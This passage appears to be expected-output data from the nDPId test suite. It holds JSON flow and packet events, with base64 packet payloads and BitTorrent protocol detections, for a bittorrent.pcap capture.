+00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1455469969680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1455469969680,"pkt":"xCwDBkn+LFbcjDU0CABFAACJEvpAAHcG+5FPNeQCwKgBAzkjzqAj4\/VaspooC4AYAQLEvgAAAQEICgAAfaoZ2\/ifE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wovPx6i8m4ev0sHgAAADnFABkMTplaTBlNDppcA=="} +01342{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1455469969689,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":620,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":620,"pkt_l4_len":586,"thread_ts_msec":1455469969689,"pkt":"xCwDBkn+LFbcjDU0CABFAAJeEvxAAHcG+bpPNeQCwKgBAzkjzqAj4\/WvspooC4AZAQKoaAAAAQEICgAAfaoZ2\/ifdjQ0Ok815AIxMjpjb21wbGV0ZV9hZ29pNmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTE0NjI3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5NmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/9\/7\/\/\/\/\/fv\/\/\/\/\/\/f\/\/\/3\/\/\/\/\/9\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/v\/+\/\/\/\/9\/\/\/\/\/\/\/\/+\/\/\/9\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/f\/\/3\/P\/\/\/\/\/4AAAAAFBAAAA2sAAAAFBAAAAW0AAAAFBAAAAlYAAAAFBAAAAdEAAAAFBAAAAPQAAAAFBAAAAtIAAAAFBAAAAMsAAAAFBAAAAyUAAAAFBAAAAKMAAAAFBAAAAMQAAAAFBAAAAcEAAAAFBAAAAtMAAAAFBAAAAiUAAAAFBAAAAEYAAAAFBAAAAT8AAAAFBAAAAe4AAAAFBAAAAjwAAAAFBAAAAvgAAAAFBAAAA2oAAAAFBAAAA2AAAAAFBAAAAJgAAAAFBAAAATQAAAAFBAAAAQ4AAAAFBAAAA0w="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1455469970233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970233,"pkt":"LFbcjDU0xCwDBkn+CABFAAB45PBAAEAGAADAqAEDlxpfHs6hWJHZNtVIfkyTS4AYJnO4TgAAAQEIChnb+7IRKfdEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjCQUdTBqR8vIZE="} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1455469970293,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469970293,"pkt":"xCwDBkn+LFbcjDU0CABFAACkCYZAAHIGRuqXGl8ewKgBA1iRzqF+TJNL2TbVjIAYHVxFKAAAAQEIChEp94AZ2\/uyE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coXQqpAS87AVXIDwAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVfYWdvaTFlMQ=="} +01305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1455469970357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469970357,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDCYlAAHIGRUiXGl8ewKgBA1iRzqF+TJO72TbVjIAYHVwHogAAAQEIChEp97wZ2\/vsOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTIyNjczZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2\/3\/\/\/\/r\/\/\/\/\/9\/3\/\/\/\/\/9\/+\/\/+\/\/+\/\/\/\/f\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/+\/\/\/+\/v\/\/\/7\/\/7\/\/9\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAUAAAAAFBAAAAboAAAAFBAAAArkAAAAFBAAAA0EAAAAFBAAAAD0AAAAFBAAAAvsAAAAFBAAAAPwAAAAFBAAAAPMAAAAFBAAAAqcAAAAFBAAAAX0AAAAFBAAAAY8AAAAFBAAAAaEAAAAFBAAAAo0AAAAFBAAAAPAAAAAFBAAAAegAAAAFBAAAAjYAAAAFBAAAARsAAAAFBAAAAm0AAAAFBAAAAoUAAAAFBAAAAUoAAAAFBAAAARkAAAAFBAAAAswAAAAFBAAAAiYAAAAFBAAAAXA="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1455469970452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970452,"pkt":"LFbcjDU0xCwDBkn+CABFAAB41kZAAEAGAADAqAEDTzeBFs6dL0HtOa3YPhLeWYAYVhCSYwAAAQEIChnb\/IcCXeBSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjpi3Emqkm5uHs80="} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1455469971321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971321,"pkt":"LFbcjDU0xCwDBkn+CABFAAB48HJAAEAGAADAqAEDxmSSCc6n6wMx0mzN3F5zZYAYZooahAAAAQEIChnb\/+QB8nE1E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjuG56+SlFtqa9S4="} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1455469971481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1455469971481,"pkt":"xCwDBkn+LFbcjDU0CABFAACcFzZAAHYG0wzGZJIJwKgBA+sDzqfcXnNlMdJtEYAYAQK5ewAAAQEICgHycUYZ2\/\/kE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopccBVvnEHfGIYQAAADnFABkMTplaTBlNDppcHY0NDrGZJIJMTI6Y29tcGxldGU="} +01316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1455469971641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":601,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":601,"pkt_l4_len":567,"thread_ts_msec":1455469971641,"pkt":"xCwDBkn+LFbcjDU0CABFAAJLGqBAAHYGzfPGZJIJwKgBA+sDzqfcXnPNMdJtEYAYAQJeTwAAAQEICgHycVYZ3ACEX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTAzZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/f9\/\/\/\/37\/\/7\/\/\/\/\/\/\/3r\/\/\/\/3+\/\/7\/\/\/\/3\/\/9\/\/\/\/\/\/\/\/\/\/\/37\/7\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/9\/\/\/gAAAAAUEAAAClAAAAAUEAAAAnQAAAAUEAAAAVwAAAAUEAAACuQAAAAUEAAAAUAAAAAUEAAAA8gAAAAUEAAAB4QAAAAUEAAADfAAAAAUEAAABUwAAAAUEAAAAKgAAAAUEAAAANAAAAAUEAAABXwAAAAUEAAAAaQAAAAUEAAAAmAAAAAUEAAACfAAAAAUEAAADWQAAAAUEAAABTAAAAAUEAAABBgAAAAUEAAABegAAAAUEAAAA1QAAAAUEAAAAxQAAAAUEAAAAvAAAAAUEAAAAnwAAAAUEAAAC6Q=="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455469971675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971675,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4IXFAAEAGAADAqAEDvmfDOM6mtimT1S+nN0acgIAY\/\/9DtgAAAQEIChncAUQAv2TsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkGjzZtimXS5YKE="} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455469972136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469972136,"pkt":"xCwDBkn+LFbcjDU0CABFAACrWLRAAHIGbE2+Z8M4wKgBA7YpzqY3RpyAk9Uv64AYAQLhNwAAAQEICgC\/ZvwZ3AFEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xopUl3euuGS1IpvoAAAEBFABkMTplaTBlNDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzE="} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455469973108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1455469973108,"pkt":"LFbcjDU0xCwDBkn+CABFAADJDUpAAEAGAADAqAEDvmfDOM6mtimT1TBDN0ac94AZ\/\/9EBwAAAQEIChncBtUAv2b8M2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0Or5nwzhlAAAAAQ8="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455469974358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974358,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DCdAAEAGAADAqAEDUjrYc86rlaExvR02+FTOIoAY\/\/\/swwAAAQEIChncC64AhEXwE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjk6UZQGZj8psqfs="} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455469974533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974533,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WuVAAEAGAADAqAEDUjlhU86qz5GeFCpM34MiOYAY0pJ1ogAAAQEIChncDF0AFHySE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjDhVI8cWXj55ew="} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455469974879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469974879,"pkt":"xCwDBkn+LFbcjDU0CABFAACrC6JAAHcGgnNSOWFTwKgBA8+RzqrfgyI5nhQqkIAYAQJ8JwAAAQEICgAUfLUZ3AxdE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wosdxOntFzioIvnoAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTBlMTptZDExOnU="} +01301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455469974888,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469974888,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8C6RAAHcGgOBSOWFTwKgBA8+RzqrfgyKwnhQqkIAZAQKTPAAAAQEICgAUfLYZ3AxdcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNTMxMzdlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTA2ZTY6eW91cmlwNDpSN80BZQAAAHQF\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/+\/\/\/\/\/\/\/\/\/r\/\/\/\/\/\/\/\/\/\/9\/\/P\/v\/\/\/\/\/+\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/ff\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/7\/\/\/\/+\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/t\/u\/\/\/\/\/\/\/\/\/gAAAAAUEAAABGAAAAAUEAAACxAAAAAUEAAAAmwAAAAUEAAAB\/wAAAAUEAAABMwAAAAUEAAABJgAAAAUEAAABZAAAAAUEAAACOgAAAAUEAAAA1QAAAAUEAAACEAAAAAUEAAACFgAAAAUEAAADTAAAAAUEAAABWwAAAAUEAAACMAAAAAUEAAADPQAAAAUEAAADSQAAAAUEAAACnwAAAAUEAAAAeQAAAAUEAAAABgAAAAUEAAAA0wAAAAUEAAABJwAAAAUEAAACfwAAAAUEAAADVQAAAAUEAAADWQ=="} +01456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455469975129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":705,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":705,"pkt_l4_len":671,"thread_ts_msec":1455469975129,"pkt":"xCwDBkn+LFbcjDU0CABFAAKzM7RAAHUG4zdSOthzwKgBA5Whzqv4VM4iMb0deoAY\/SAeWQAAAQEICgCERjQZ3AuuE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3woo6KDyQqidsX6OsAAADnFABkMTplaTBlNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MDdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/e\/\/\/\/\/9\/\/\/\/\/v\/\/2\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/7\/f\/+\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\